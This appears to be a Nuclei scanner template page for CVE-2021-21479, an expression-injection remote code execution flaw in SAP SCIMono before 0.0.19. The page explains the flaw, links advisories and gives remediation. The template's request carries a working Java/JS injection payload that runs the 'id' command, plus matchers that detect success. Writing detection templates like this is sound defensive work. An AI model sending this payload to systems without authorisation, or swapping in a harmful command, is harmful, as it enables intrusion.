Skip to content
Nuclei Templates

SCIMono <0.0.19 - Remote Code Execution

ID: CVE-2021-21479

Severity: critical

Author: dwisiswant0

Tags: cve,cve2021,scimono,rce,sap

Description

Section titled “Description”

SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject andexecute java expressions and compromise the availability and integrity of the system.

YAML Source

Section titled “YAML Source”
id: CVE-2021-21479


info:
  name: SCIMono <0.0.19 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
    execute java expressions and compromise the availability and integrity of the system.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21479
    - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-21479
    cwe-id: CWE-74
    epss-score: 0.00396
    epss-percentile: 0.70798
    cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: scimono
  tags: cve,cve2021,scimono,rce,sap


http:
  - method: GET
    path:
      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"


    matchers:
      - type: word
        part: body
        words:
          - "The attribute value"
          - "java.lang.UNIXProcess@"
          - "has invalid value!"
          - '"status" : "400"'
        condition: and
# digest: 4a0a00473045022100b8efea520fb18359c6eff314400ec85ed42e28ddee42cb92f2154b0602f6c0cf022052aad29c18fb4775f2260dd264af390b5f1b322c89cd8448e787540e92fbfe5c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21479.yaml"

View on Github